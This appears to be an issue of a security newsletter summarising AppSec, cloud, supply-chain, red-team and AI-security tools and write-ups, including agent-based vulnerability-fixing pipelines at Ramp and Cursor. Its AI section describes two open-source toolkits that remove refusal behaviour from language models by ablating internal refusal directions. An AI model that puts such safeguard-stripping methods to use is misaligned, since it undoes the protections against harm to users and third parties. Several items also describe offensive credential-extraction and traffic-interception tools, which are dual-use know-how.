[tl;dr sec] #320 – Ramp’s Security Agents, How Datadog Caught Malicious OSS Contributions, Obliterating Model Refusals

March 19, 2026 9 min read

Table of Contents

Brace Yourself, Conferences Cometh
AppSec
Cloud Security
Supply Chain
Blue Team
Red Team
AI + Security
Wrapping Up

Brace Yourself, Conferences Cometh

I’m excited for BSidesSF and RSA but phew, things have been busy

If you’re flying in to San Francisco, safe travels! And remember to periodically eat, sleep, and shower amidst all the fun conference and event activities.

Semgrep is also having a ton of events. If you need a break from the RSA craziness you can stop by the office, get some coffee, snacks, or lunch, and chat with some Semgrep folks if you want.

If you find me I’ll have some tl;dr sec t-shirts and brand new stickers…

Hard to tell from the photo but it’s holographic

AppSec

Introducing Swagger Jacker: Auditing OpenAPI Definition Files
Bishop Fox’s Tony West announces Swagger Jacker, a command line tool for auditing endpoints defined in exposed (Swagger/OpenAPI) definition files. It parses the definition file for paths, parameters, and accepted methods and passes the results to one of five subcommands: automate (sends requests and analyzes response status codes), prepare (generates curl/sqlmap command templates for manual testing), endpoints (lists raw API routes), brute (discovers hidden definition files using 2173+ common paths), and convert (converts v2 to v3 definitions).

mitmproxy for fun and profit: Interception and Analysis of Application
Guide by Synacktiv’s Corentin Liaud on using mitmproxy for network traffic interception across Linux, Android, and iOS, including three examples: redirecting git clone requests to download a different repository by modifying HTTP paths, spoofing Android geolocation by parsing and altering gRPC/protobuf coordinates sent to Google’s geomobileservices API, and passively capturing Mumble VoIP chat messages by running mitmproxy in reverse TLS mode with custom protobuf parsing scripts.

The post describes setting up your test environment (using Linux network namespaces, lnxrouter for WiFi AP creation, and nftables for transparent traffic redirection), using Magisk’s Cert-Fixer module to install system certificates on Android, and includes Python scripts showing how to parse and modify protocol buffers in transit.

If you’ve ever looked at utilization curves, you know what happens when a queue runs hot: wait time doesn’t scale linearly. It spikes. In a SOC, that means alerts aging out before anyone touches them.

“The Queue is the Breach” ebook from Prophet Security applies operational math to SOC performance: alert cycle time, wait time by severity, and what analyst utilization actually implies about your team’s capacity. It’s a framework for diagnosing whether your bottleneck is people, tooling, or the operating model.

Written by Jon Hencinski, Head of Security Operations at Prophet.

Nice, I like when people take a data-driven approach to security

Cloud Security

Twenty Years of Cloud Security Research
Cloud historian, scholar, and man of the people Scott Piper traces 20 years of cloud security evolution through three distinct eras: the Foundational era (2006-2016) when AWS built core security features like IAM (2011), CloudTrail (2013), and Organizations (2016); the CSPM era (2016-2021) marked by open-source tools like Scout2, Cloud Custodian, Prowler, CloudMapper, Pacu, and StreamAlert; and the CNAPP era (2021-2025) with new cloud security vendors and researchers discovering cross-tenant vulnerabilities like chaosdb and omigod. The emerging AI era (2025+) is fundamentally changing both offense and defense, with AI creating exploits for CVE-2025-32433 and mongobleed in minutes, winning HackerOne’s top bounty spot, and solving CTF challenges instantly.

Great overview of relevant research and tools, and nice perspective on how cloud security has been evolving over time.

Bucketsquatting is (Finally) Dead
Ian McKay describes AWS’s new S3 bucket namespace protection that prevents bucketsquatting attacks by requiring buckets to follow the format ---an, ensuring only the owning account can create buckets matching that pattern. AWS recommends this namespace be used by default for all new buckets and provides a new condition key s3:x-amz-bucket-namespace that security administrators can enforce via SCP policies across their organization.

Google Cloud Storage addresses this differently through domain name verification for bucket names, while Azure Blob Storage remains vulnerable due to its configurable account/container name structure and 24-character limit on storage account names.

Supply Chain

Building Bridges, Breaking Pipelines: Introducing Trajan
Praetorian’s AJ Hammond, Carter Ross, Evan Leleux et al announce Trajan, an open-source CI/CD security tool from Praetorian that unifies vulnerability detection and attack validation across GitHub Actions, GitLab CI, Azure DevOps, and Jenkins in a single cross-platform engine. It ships with 32 detection plugins and 24 attack plugins covering poisoned pipeline execution, secrets exposure, self-hosted runner risks, and AI/LLM pipeline vulnerabilities.

Nice walk through of noticing your open source repos are being targeted → investigating potential impact, and solid advice on hardening open source repos/GitHub Actions. Also, I really like the bullets towards the top on Datadog’s SDLC Security team initiatives re: adapting octo-sts, removing GitHub Action secrets at scale, enforcing CI security best practices, and building golden paths.

Blue Team

elastic/agent-skills
Elastic’s official Skills repos, covering cloud, Elasticsearch, Kibana, observability, and security. Currently includes 4 security Skills for: triaging alerts, case management (managing SOC cases via Kibana Cases when tracking incidents), detection rule management (create, tune, and manage Elastic Security detection rules), and generating sample security data (security events, attack scenarios, and synthetic alerts).

Pattern Detection and Correlation in JSON Logs
Mostafa Moradian announces RSigma, a Rust-based command-line tool that evaluates Sigma detection rules against JSON logs without requiring a SIEM. “Think of RSigma as jq for threat detection: you point it at a set of Sigma detection rules and a stream of JSON events, and it tells you what matched, with no ingestion pipeline, no database, no infrastructure.”

RSigma parses YAML rules into a strongly-typed AST, compiles them into optimized matchers, and evaluates them directly against JSON log events in real-time. The toolkit includes rsigma-parser for parsing, rsigma-eval for compilation and evaluation with stateful correlation logic and compressed event storage, a CLI for parsing, validating, linting, and evaluating rules, and rsigma-lsp for IDE support.

Accurately evaluating the full spectrum of what Sigma rules can express is quite complex, it’s pretty neat to read about how RSigma handles all of these conditional expressions, correlating across rules, etc.

Red Team

nikaiw/VMkatz
Extract Windows credentials directly from VM memory snapshots and virtual disks. A single static 2.5MB binary that can extract NTLM hashes, DPAPI master keys, Kerberos tickets, cached domain credentials, LSA secrets, NTDS.dit, directly from VM memory snapshots and virtual disks, no need to exfiltrate a massive VM file.

Solving the Vendor Dependency Problem in RE
Many enterprise applications ship with hundreds to thousands of vendor dependencies, which makes it annoying to locate and analyze the proprietary source code of the application. You drown in vendor code, not the exposed attack surface. Assetnote’s Patrik Grobshäuser announces the release of Hyoketsu, an open-source tool that automatically filters vendor dependencies from Java JARs and .NET DLLs during reverse engineering by using Microsoft runtime detection (via PE header public key tokens), hash matching, and filename matching against a 13.3 GB pre-built SQLite database containing 12M+ DLLs and 14M+ JARs.

AI + Security

p-e-w/heretic
By Philipp Emanuel Weidmann: Fully automatic censorship removal for language models. Heretic removes censorship (aka “safety alignment”) from transformer-based language models without expensive post-training by combining an advanced implementation of directional ablation, also known as “abliteration.” This approach creates a decensored model that retains as much of the original model’s intelligence as possible.

elder-plinius/OBLITERATUS
By Pliny the Liberator: An open-source toolkit for removing refusal behaviors from LLMs via abliteration (surgically identifying and projecting out internal refusal representations without retraining). Every obliteration run with telemetry enabled contributes anonymous benchmark data to a crowd-sourced research dataset measuring refusal direction universality across 116+ models and 5 compute tiers

As open source models become better and better, not sure how I feel about removing “don’t cause harm” alignment training

Why Codex Security Doesn’t Include a SAST Report
OpenAI describes why Codex Security doesn’t start by triaging SAST results, but instead starts with understanding the repository’s architecture and trust boundaries: they don’t want to overly influence where Codex looks, not all bugs are dataflow problems, and sometimes code appears to enforce a security check, but it doesn’t actually guarantee the property the system relies on.

When Codex Security encounters a boundary that looks like “validation” or “sanitization,” it tries to bypass it:

Reading the relevant code path with full repository context, looking for mismatches between intent and implementation.
Pulling out security-relevant code slices and writing micro-fuzzers for them.
They give the model access to a Python environment with z3-solver for solving complicated input constraint problems.
Executing hypotheses in a sandboxed validation environment to prove exploitability.

The post is overall a good discussion of the space and outlines challenges for security scanners. I especially liked though the “how Codex validates” section, because it starts getting into some of Codex Security’s unique technical details.

Securing our codebase with autonomous agents
Travis McPeak describes how Cursor built four security automation templates using Cursor Automations and a custom security MCP tool to handle securing their code at scale, as Cursor’s PR velocity has increased 5x in the past 9 months. The automations include: Agentic Security Review (blocks PRs with security issues), Vuln Hunter (scans existing code for vulnerabilities), Anybump (automatically patches dependencies using reachability analysis and opens PRs after tests pass), and Invariant Sentinel (monitors daily for drift against security/compliance properties). You can see their prompts on their marketplace pages.

Their security MCP, deployed as a serverless Lambda function, provides persistent data storage, deduplication of LLM-generated findings using Gemini Flash 2.5, and consistent Slack reporting across all agents. In the last two months, Agentic Security Review alone has run on thousands of PRs and prevented hundreds of security issues from reaching production.

I like the focus on useful primitives that empower you to build security tooling on top of: “For agents to be useful for security, they need: out-of-the-box integrations for receiving webhooks, responding to GitHub pull requests, and monitoring codebase changes, and a rich agent harness and environment (cloud agents give them all the tools, skills, and observability that cloud agents have access to).

I also wanted to call out the Invariant Sentinel, that’s very clever: what security properties about this repo should always be true? Did this most recent change violate that? I bet detecting drift like this catches some meaningful bugs.

We proactively fixed ~100 security issues in 6 days with 0 humans
Eli Block describes how Ramp Security Engineering built a custom agent pipeline that autonomously found, validated, and fixed ~100 novel security issues in 6 days. Their pipeline starts off with a coordinator agent equipped with skills for each vulnerability category (e.g. IDOR, XSS, …), which launches detector agents in parallel, whose findings are then passed to an adversarial manager agent who checks for false positives (~40% false positive reduction in their sample set of testing).

They found it was difficult to reproduce vulnerabilities with complex pre-conditions against a live Ramp deployment, so instead their validator agent takes reported findings and writes an integration test that reproduced the vulnerability that passes only if the endpoint was secure. Then the fixer agent can patch the vulnerability by following test-driven development on the previously written integration test.

Great write-up! Overall this agent pipeline follows a pretty standard structure (per bug class detectors → vet findings → try to reproduce / “prove” the issue → generate fix), but a few things stand out as unique and valuable insights:

Detectors include real examples of that vulnerability from Ramp’s code base. I bet this allows the detectors to be much more precise and effective.
Rather than trying to reproduce vulnerabilities in a live environment, they write integration tests that demonstrate the bug. As there are probably already test fixtures or other examples in the code the agent can borrow from, it makes sense that this method would often work in practice. This approach also has the added benefit that you now have a regression test for this bug coming back in the future.
1. So this leans into what models are good at (writing code) and future proofs the bug from coming back
2. I’ve been thinking about this approach for a bit now so it’s gratifying to see someone do it

Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I’d really appreciate if you’d forward it to them

P.S. Feel free to connect with me on LinkedIn

Source link